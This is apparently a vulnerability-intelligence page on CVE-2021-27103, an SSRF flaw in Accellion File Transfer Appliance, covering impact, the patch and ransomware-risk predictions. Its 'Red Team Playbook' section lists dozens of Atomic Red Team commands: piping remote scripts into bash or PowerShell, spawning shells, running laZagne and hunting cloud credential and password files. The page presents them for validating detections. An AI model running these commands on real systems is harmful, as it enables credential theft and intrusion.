CVE-2021-27103
Overview
This vulnerability is a Server-Side Request Forgery (SSRF) affecting the Accellion File Transfer Appliance (FTA) versions 9_12_411 and earlier. The root cause lies in improper validation of user-supplied input within the wmProgressstat.html endpoint, which allows an attacker to craft POST requests that manipulate internal server requests. The affected component is the web interface handling progress status updates, which does not restrict outbound requests initiated by the server based on user input.
Vulnerability Description
Accellion FTA 9_12_411 and earlier is affected by SSRF via a crafted POST request to wmProgressstat.html. The fixed version is FTA_9_12_416 and later.
Impact
An unauthenticated attacker can exploit this SSRF vulnerability to make the Accellion FTA server send arbitrary HTTP requests to internal or external systems. This can lead to unauthorized access to internal services, data exfiltration, or further network reconnaissance. The attacker can leverage this to bypass network restrictions and potentially pivot into protected environments, resulting in significant data breaches or disruption of internal services.
Solution
To remediate this vulnerability, upgrade Accellion FTA to version 9_12_416 or later as specified by the vendor. Detailed patch instructions and version information are available on the official Accellion product page at https://www.accellion.com/products/fta/. Applying this update will enforce proper input validation and mitigate the SSRF issue in the wmProgressstat.html endpoint.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Accellion's File Transfer Appliance (FTA) arises from a Server-Side Request Forgery (SSRF) flaw that can be exploited through a specially crafted POST request to the wmProgressstat.html endpoint. This particular weakness allows an attacker to manipulate the server into making requests to internal or external resources that should otherwise be inaccessible. By leveraging this vulnerability, an attacker could potentially gain access to sensitive information, including internal network services, metadata, and other resources that are not intended to be exposed to the public internet. The severity of this flaw is underscored by its high CVSS score of 9.8, indicating a critical risk that necessitates immediate attention.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious POST request targeting the vulnerable endpoint, which could lead to unauthorized access to internal systems. For instance, if the Accellion FTA is deployed in an environment where it has access to internal APIs or databases, an attacker could utilize SSRF to retrieve sensitive data, such as credentials or configuration files. Moreover, this type of attack can be compounded by the presence of misconfigured firewalls or overly permissive access controls, further increasing the likelihood of successful exploitation. Scenarios may also include chaining this vulnerability with other weaknesses in the environment to escalate privileges or pivot to other systems within the network.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on the Accellion FTA for secure file transfers. Successful exploitation could lead to data breaches, where sensitive information is exfiltrated or compromised. This could result in severe reputational damage, loss of customer trust, and potential legal ramifications depending on the nature of the data exposed. Furthermore, the financial implications could be substantial, encompassing costs related to incident response, remediation, and potential regulatory fines. Organizations that fail to address this vulnerability may find themselves at a heightened risk of cyberattacks, especially given the increasing sophistication of threat actors targeting supply chain vulnerabilities.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First and foremost, upgrading to the fixed version of the Accellion FTA is essential to eliminate the underlying flaw. Regular patch management practices should be established to ensure that all software components are up to date and vulnerabilities are addressed promptly. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their configurations and access controls. Monitoring network traffic for unusual patterns or unauthorized requests can also aid in early detection of exploitation attempts. Employing web application firewalls (WAFs) and intrusion detection systems (IDS) can provide an additional layer of protection against SSRF attacks.
In conclusion, the SSRF vulnerability in Accellion's File Transfer Appliance represents a critical security risk that can have far-reaching implications for affected organizations. Understanding the technical details, potential attack vectors, and real-world impacts is crucial for effective risk management. By prioritizing detection and mitigation strategies, organizations can safeguard their sensitive data and maintain the integrity of their systems against evolving cyber threats.
CSURFACE threat intelligence has detected a marked escalation in the exploit prediction score for CVE-2021-27103, with the EPSS rising sharply to place this vulnerability in the 95th percentile of likely exploitation. This surge indicates that threat actors, including ransomware groups such as Clop, are increasingly prioritizing this SSRF flaw in Accellion’s File Transfer Appliance as an attack vector. Although no new exploit techniques have been publicly disclosed, the rapid upward trend in exploitation probability underscores a growing operational focus on this vulnerability within the cybercriminal ecosystem. For defenders, this shift elevates the urgency of monitoring related network traffic and reinforces the criticality of deploying compensating controls, as the risk of successful exploitation and subsequent ransomware deployment is now significantly heightened. Consequently, the threat level associated with CVE-2021-27103 has intensified, reflecting an environment where adversaries are more actively leveraging this weakness to achieve initial access and lateral movement.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Accellion | Fta | All |
cpe:2.3:a:accellion:fta:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, PowerShell Empire, TinyMet (1254 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-664 | Server Side Request Forgery |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-27103 |
| accellion.com |
GitHub CVE
x_refsource_MISC
|
https://www.accellion.com/products/fta/ |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/accellion/CVEs/blob/main/CVE-2021-27103.txt |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-27103 |